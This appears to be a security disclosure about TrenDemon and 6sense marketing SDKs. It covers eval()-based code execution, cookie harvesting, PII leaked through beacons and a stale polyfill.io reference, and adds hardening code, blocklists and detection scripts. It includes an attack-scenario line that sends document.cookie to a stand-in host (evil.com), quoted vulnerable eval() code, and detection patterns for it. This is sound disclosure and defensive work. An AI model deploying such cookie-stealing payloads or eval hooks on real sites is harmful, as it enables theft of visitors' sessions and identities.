DISCLOSURE: This investigation presents technical forensic findings from publicly observable network traffic. All PII has been redacted. This is security research, not an attack.
We found five zero-day vulnerabilities in the B2B marketing stack by visiting a privacy policy page with a HAR recorder running. We were deanonymized while the page was still loading code from a compromised supply chain.
"I just got deanonymized reading a privacy policy—while the page loaded code from a CDN compromised by a Chinese acquisition 18 months ago."
— Discovery moment, 2025-12-04
BTI-2025-0023-A
6sense beacon re-transmits ENTIRE Epsilon deanonymization response (phone, address) to ALL 6sense customers via cached q.metadata.ores parameter. Visitors permanently deanonymized for 760 days.
BTI-2025-0025-A
Any TrenDemon customer can execute arbitrary JavaScript in visitor browsers via CTA configuration. 6 distinct eval() vectors in trends.min.js.
BTI-2025-0025-B
Video players (Wistia, Brightcove, Vidyard) weaponized as execution triggers. Video completion events fire eval(postCompletionScript). Marketing funnel = kill chain.
BTI-2025-0025-C
TrenDemon harvests Marketo _mkto_trk cookie via btoa(this.context.maCookie), exfiltrates to trackingapi.trendemon.com on form submission.
BTI-2025-0025-D
TrenDemon SDK still references polyfill.io, a domain taken over by Funnull CDN and caught serving malicious JavaScript in June 2024. Older browsers (IE11, Safari <9) fetch a script from the compromised domain. The loader function is misspelled as 'loadPollyills'.
TrenDemon's SDK contains 6 distinct eval() code execution vectors. Any TrenDemon customer (or attacker with CTA access) can execute arbitrary JavaScript in visitor browsers through their dashboard configuration.
Attack Scenario: Create a TrenDemon account → Configure a CTA with fetch('https://evil.com/'+document.cookie) as its custom tracking code → Deploy on the target site → Every visitor who loads or clicks the CTA executes attacker code.
$Trd_Utils.sendGa4Tracking = function (ctaParams, event, page) {
    var trackingCodeToEval;
    switch (event) {
        case "load":
            trackingCodeToEval = ctaParams.CustomImpressionTrackingCode;
            break;
        case "click":
            trackingCodeToEval = ctaParams.CustomClickTrackingCode;
            break;
    }
    return (null == trackingCodeToEval ? void 0 : trackingCodeToEval.length)
        ? eval(trackingCodeToEval) // <-- ARBITRARY CODE EXECUTION: dashboard-supplied string run as code
        : dataLayer.push({...});
};

t.prototype.loadPollyills = function (t) { // Note: MISSPELLED
    if (Array.prototype.findIndex) t(); // Modern browser: polyfill not needed, skip
    else {
        var e = document.createElement("script");
        e.src = "https://polyfill.io/v3/polyfill.min.js?features=...";
        // LOADS FROM COMPROMISED DOMAIN ON OLDER BROWSERS
    }
};

The polyfill.io domain (and its GitHub account) was sold to Funnull CDN in February 2024; by June 2024 the domain was injecting malicious JavaScript into the 100,000+ websites that still embedded it. TrenDemon's production code STILL references the compromised domain 18 months later.
Fires when Array.prototype.findIndex unavailable (IE11, Safari <9, older mobile browsers)
Function misspelled as loadPollyills instead of loadPolyfills, a sign that this code has not been revisited since it was written.
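Back to the CTA tracking hook: the following is an added example, not TrenDemon's code. It places the eval()-based pattern from the snippet above (sendGa4TrackingUnsafe) beside a hardened version (sendGa4TrackingSafe) that treats the CTA configuration as data describing an analytics event rather than as code. The function names, the impressionEvent/clickEvent config shape, the dataLayer stand-in and the attacker payload (which sets a marker instead of calling fetch) are assumptions made for this example.

```javascript
// Added example, not TrenDemon's code: the eval()-based CTA tracking hook
// from the page (sendGa4TrackingUnsafe) beside a hardened version
// (sendGa4TrackingSafe) that treats CTA configuration as data. The names,
// the impressionEvent/clickEvent config shape and the dataLayer stand-in
// are assumptions made for this example.

// Stand-in for the GTM data layer the real SDK pushes events into.
const dataLayer = [];

// Same shape as the page's snippet: a dashboard-supplied string is handed
// straight to eval() when the CTA is shown ("load") or clicked ("click").
function sendGa4TrackingUnsafe(ctaParams, event) {
  let trackingCodeToEval;
  switch (event) {
    case "load":
      trackingCodeToEval = ctaParams.CustomImpressionTrackingCode;
      break;
    case "click":
      trackingCodeToEval = ctaParams.CustomClickTrackingCode;
      break;
  }
  return trackingCodeToEval && trackingCodeToEval.length
    ? eval(trackingCodeToEval) // attacker-controlled config becomes code
    : dataLayer.push({ event: "trd_cta_" + event, ctaId: ctaParams.id });
}

// Hardened: the config may only describe an analytics event (a name plus
// flat scalar parameters). No string from the dashboard is ever executed.
const IDENT = /^[a-z][a-z0-9_]{0,39}$/;
const MAX_PARAMS = 20;

function sendGa4TrackingSafe(ctaParams, event) {
  const cfg = event === "load" ? ctaParams.impressionEvent
            : event === "click" ? ctaParams.clickEvent : undefined;
  if (cfg === undefined) {
    return dataLayer.push({ event: "trd_cta_" + event, ctaId: ctaParams.id });
  }
  if (typeof cfg !== "object" || cfg === null || Array.isArray(cfg)) {
    throw new TypeError("CTA tracking config must be an object, not code");
  }
  if (typeof cfg.name !== "string" || !IDENT.test(cfg.name)) {
    throw new TypeError("invalid GA4 event name");
  }
  const entries = Object.entries(cfg.params || {});
  if (entries.length > MAX_PARAMS) throw new RangeError("too many event params");
  const params = {};
  for (const [k, v] of entries) {
    if (!IDENT.test(k)) throw new TypeError("invalid param key " + k);
    if (!["string", "number", "boolean"].includes(typeof v)) {
      throw new TypeError("param " + k + " must be a scalar");
    }
    params[k] = typeof v === "string" ? v.slice(0, 100) : v;
  }
  return dataLayer.push({ event: cfg.name, ctaId: ctaParams.id, ...params });
}

// Constructed attacker CTA config. Instead of fetch('https://evil.com/'+
// document.cookie) it sets a marker so the effect is observable offline.
const maliciousCta = {
  id: "cta-42",
  CustomClickTrackingCode: "globalThis.pwned = true; 'exfil done'",
  clickEvent: "globalThis.pwned = true", // rejected: a string, not an event object
};

const benignCta = {
  id: "cta-7",
  clickEvent: { name: "cta_click", params: { campaign: "q4_webinar", position: 3 } },
};

// Run both paths against the malicious config, then the benign one.
function demo() {
  globalThis.pwned = false;
  const unsafeResult = sendGa4TrackingUnsafe(maliciousCta, "click");
  const unsafeRan = globalThis.pwned === true;

  globalThis.pwned = false;
  let safeRejected = false;
  try {
    sendGa4TrackingSafe(maliciousCta, "click");
  } catch (e) {
    safeRejected = e instanceof TypeError;
  }
  const safeRan = globalThis.pwned === true;

  sendGa4TrackingSafe(benignCta, "click");
  return { unsafeResult, unsafeRan, safeRejected, safeRan, lastEvent: dataLayer[dataLayer.length - 1] };
}
```

The hardened path does not try to sanitize the string; it changes the contract so that the dashboard can only name an event and supply scalar parameters, which is all the dataLayer.push fallback in the original ever needed. That also lets a site drop 'unsafe-eval' from its CSP, since nothing in this path evaluates code.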
6sense's beacon re-transmits the ENTIRE Epsilon deanonymization response (including phone and address) in the q.metadata.ores parameter. Any site running 6sense can retrieve this cached PII.
Once 6sense deanonymizes you on ANY website, your company info (phone, address, company name) is cached and available to ALL 6sense customers for 760 days, without hitting the Epsilon data broker again.
// HAR line 74639 - Beacon re-exfiltrates ENTIRE Epsilon response
GET /v1/beacon/img.gif?
    q.metadata.ores={"company":"Ronin","phone":"[REDACTED]","address":"[REDACTED]"}
    &6suuid=0868dc17054b1100573f016922000000304d0200
    &company_id=24deccd977193c4
// ANY 6sense customer can retrieve this cached PII for 760 days

Video players (Wistia, Brightcove, Vidyard) aren't just tracking engagement. They're execution triggers: when the video ends and the credits roll, eval(postCompletionScript) fires.
Wistia/Brightcove/Vidyard script injected via innerHTML. Visitor identity already captured.
Maximum engagement achieved. User has invested time, trust at peak. Perfect social engineering moment.
eval(postCompletionScript) executes. Video player was just a fancy setTimeout().
// Video completion triggers arbitrary code execution
if (this.model.videoScript && this.model.videoScript.length) {
    var _ = document.createElement("dummy");
    _.innerHTML = this.model.videoScript; // DOM injection: vendor-supplied markup parsed into a detached element
    Array.from(_.querySelectorAll("script"))
        .filter(function (t) { return t.src; })
        .forEach(function (t) {
            $Trd_Utils.isVideoScriptSourceValid(t.src) && // Wistia/Brightcove/Vidyard
                $Trd_Utils.loadJs(t.src, new Date().getTime().toString());
        });
}
// On video completion:
(_a.length) && eval(personal.postCompletionScript) // arbitrary JS runs in the visitor's browser

TrenDemon harvests Marketo's _mkto_trk cookie, Base64-encodes it as maCook, and exfiltrates it to trackingapi.trendemon.com on every form submission. Cookie value observed:

id:958-TTM-744&token:_mch-6sense.com-33fe35d4df8d6e33441925452a7b0e80

Cross-vendor cookie sharing without consent. Links the Marketo identity to TrenDemon's visitor graph.
// Line 4994-5003 - Marketo cookie exfiltration
this.context.maCookie &&
    (p.maCook = btoa(this.context.maCookie)); // Base64-encode the harvested Marketo cookie
var g = "/api/experience/new-lead?" + params;
$Trd_Tools.JSONP(g, ...) // Exfiltrate to TrenDemon

# TrenDemon (CRITICAL)
||trackingapi.trendemon.com^
||assets.trendemon.com^
||trendemon.com^
# 6sense (CRITICAL)
||6sc.co^
||eps.6sc.co^
||b.6sc.co^
# polyfill.io (COMPROMISED)
||polyfill.io^

# TrenDemon SDK
"$Trd_Utils"
"$Trd_Tools"
"sendGa4Tracking"
"CustomClickTrackingCode"
"loadPollyills" // MISSPELLED
"postCompletionScript"
# Dangerous patterns
eval(trackingCodeToEval)
eval(actionScript)
eval(personal.postCompletionScript)
IMMEDIATE ACTION
1. Remove TrenDemon
Delete all TrenDemon script tags from your site. Check GTM containers.
2. Block at CDN/WAF
Add *.trendemon.com and polyfill.io to blocklist.
3. Audit 6sense Integration
Review what subprocessors 6sense deploys on your domain. Check for TrenDemon AccountId.
4. Review Marketo Cookies
Check if trd_ma_cookie exists. If so, your Marketo data was harvested.
5. Notify Legal/DPO
A 760-day identifier cookie and undisclosed cross-vendor data sharing are hard to reconcile with GDPR's storage-limitation and transparency requirements; both must be disclosed and justified, and the sharing needs a lawful basis.
DETECTION & MONITORING
1. SIEM Rule: eval() in Marketing Tags
Alert on CSP violation reports where blocked-uri is "eval" and source-file is a known marketing vendor domain. This requires a script-src policy without 'unsafe-eval' and a report-uri or report-to endpoint that feeds the SIEM.
2. Network Monitor: TrenDemon API
Watch for trackingapi.trendemon.com outbound connections.
3. CSP Header Update
Remove 'unsafe-eval' from script-src and do not list *.trendemon.com (or any vendor you have not audited) as an allowed source. CSP is an allowlist: a host is blocked by leaving it out, not by naming it.
4. HAR Analysis
Capture HAR on your marketing pages. Search for $Trd_Utils or loadPollyills.
5. Supply Chain Audit
Grep all vendor scripts for polyfill.io references. Replace with cdnjs or self-hosted.
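Steps 1, 4 and 5 above, and the beacon finding earlier on this page, come down to walking captured traffic and matching it against a short list of hosts and strings. The block below is an added example written for this page, not a tool from the original investigation. scanHar() walks HAR entries and flags (1) requests to hosts on the blocklist, (2) response bodies containing the SDK fingerprints and eval() patterns listed above, and (3) query parameters whose value is a JSON object with PII-looking keys, which is the q.metadata.ores pattern. classifyCspReport() picks out CSP reports for a blocked eval() whose source-file is one of the same vendor hosts. The HAR and CSP report are constructed sample data; the literal body patterns follow the page's own listing and may appear under other names in a minified production build.

```javascript
// Added example for this page (not the investigation's own tooling):
// offline HAR scan plus CSP eval-report triage. Sample data is constructed.

const VENDOR_HOSTS = ["trendemon.com", "6sc.co", "polyfill.io"];
const BODY_PATTERNS = ["$Trd_Utils", "loadPollyills", "eval(trackingCodeToEval)",
  "eval(personal.postCompletionScript)", "polyfill.io"];
const PII_KEYS = ["phone", "address", "email", "first_name", "last_name"];

// Exact host or any subdomain of it, mirroring uBlock's ||host^ semantics.
function hostMatches(host, blocked) {
  return host === blocked || host.endsWith("." + blocked);
}

function vendorFor(urlString) {
  const host = new URL(urlString).hostname.toLowerCase();
  return VENDOR_HOSTS.find((v) => hostMatches(host, v)) || null;
}

// Query parameters whose value parses as a JSON object carrying PII keys.
function piiParams(urlString) {
  const hits = [];
  for (const [key, value] of new URL(urlString).searchParams) {
    let obj;
    try { obj = JSON.parse(value); } catch (e) { continue; }
    if (!obj || typeof obj !== "object") continue;
    const keys = Object.keys(obj).filter((k) => PII_KEYS.includes(k.toLowerCase()));
    if (keys.length) hits.push({ param: key, piiKeys: keys });
  }
  return hits;
}

function scanHar(har) {
  const findings = [];
  har.log.entries.forEach((entry, index) => {
    const url = entry.request.url;
    const vendor = vendorFor(url);
    if (vendor) findings.push({ index, kind: "vendor-host", url, vendor });
    for (const hit of piiParams(url)) {
      findings.push({ index, kind: "pii-in-query", url, ...hit });
    }
    const body = entry.response && entry.response.content && entry.response.content.text;
    if (typeof body === "string") {
      for (const pattern of BODY_PATTERNS) {
        if (body.includes(pattern)) findings.push({ index, kind: "body-pattern", url, pattern });
      }
    }
  });
  return findings;
}

// A CSP report for a blocked eval() has blocked-uri "eval"; the script that
// called it is named in source-file.
function classifyCspReport(report) {
  const r = report["csp-report"] || report;
  if (r["blocked-uri"] !== "eval") return null;
  const src = r["source-file"];
  let vendor = null;
  try { vendor = src ? vendorFor(src) : null; } catch (e) { vendor = null; }
  return { eval: true, sourceFile: src || null, vendor };
}

// Constructed sample HAR: one SDK download whose body carries the fingerprints,
// one beacon with PII JSON in its query string, one unrelated request.
const sampleHar = { log: { entries: [
  { request: { url: "https://assets.trendemon.com/trends.min.js" },
    response: { content: { text: "var $Trd_Utils={};t.prototype.loadPollyills=function(){};eval(trackingCodeToEval)" } } },
  { request: { url: "https://b.6sc.co/v1/beacon/img.gif?q.metadata.ores=" +
      encodeURIComponent(JSON.stringify({ company: "Example Co", phone: "[REDACTED]", address: "[REDACTED]" })) +
      "&6suuid=REDACTED" },
    response: { content: { text: "" } } },
  { request: { url: "https://www.example.com/privacy" },
    response: { content: { text: "<html>Privacy Policy</html>" } } },
] } };

// Constructed CSP report as a report-uri endpoint would receive it.
const sampleCspReport = { "csp-report": {
  "document-uri": "https://www.example.com/privacy",
  "violated-directive": "script-src",
  "blocked-uri": "eval",
  "source-file": "https://assets.trendemon.com/trends.min.js",
  "line-number": 1,
} };
```

Point scanHar at JSON.parse of a real HAR export; the pii-in-query check is the one worth keeping on permanently, since it catches any vendor that round-trips enrichment data through image beacons, not just the parameter name seen here.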
PERSONAL PROTECTION
1. Install uBlock Origin
Add custom filter: ||trendemon.com^
2. Clear TrenDemon Cookies
Delete all cookies matching trd_* pattern.
3. Clear localStorage
Remove trd_vid_l and trd_vuid_l keys.
4. Block 6sense Domains
Add *.6sc.co to your blocklist to prevent deanonymization.
5. Use Modern Browser
polyfill.io only fires on IE11/Safari <9. Modern browsers skip the compromised CDN.
# uBlock Origin Custom Filters
# ||trendemon.com^ already covers every subdomain; the host-specific rules are kept for readability.
||trendemon.com^
||trackingapi.trendemon.com^
||assets.trendemon.com^
||6sc.co^
||polyfill.io^

# Browser Console - Clear TrenDemon Data
// Clear cookies. A cookie is only removed when path (and domain, if one was set)
// match, so expire each trd_* cookie on the root path for this host and for the
// parent domain. Adjust the domain for multi-part TLDs such as .co.uk.
document.cookie.split(";").forEach(c => {
    const name = c.split("=")[0].trim();
    if (!name.startsWith("trd_")) return;
    const expired = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT;path=/";
    document.cookie = expired;
    document.cookie = expired + ";domain=." + location.hostname.split(".").slice(-2).join(".");
});
// Clear localStorage (trd_vid_l, trd_vuid_l and any other trd_* keys)
Object.keys(localStorage)
    .filter(k => k.startsWith("trd_"))
    .forEach(k => localStorage.removeItem(k));

This is what we found by reading their privacy policy. Imagine what's running on YOUR site.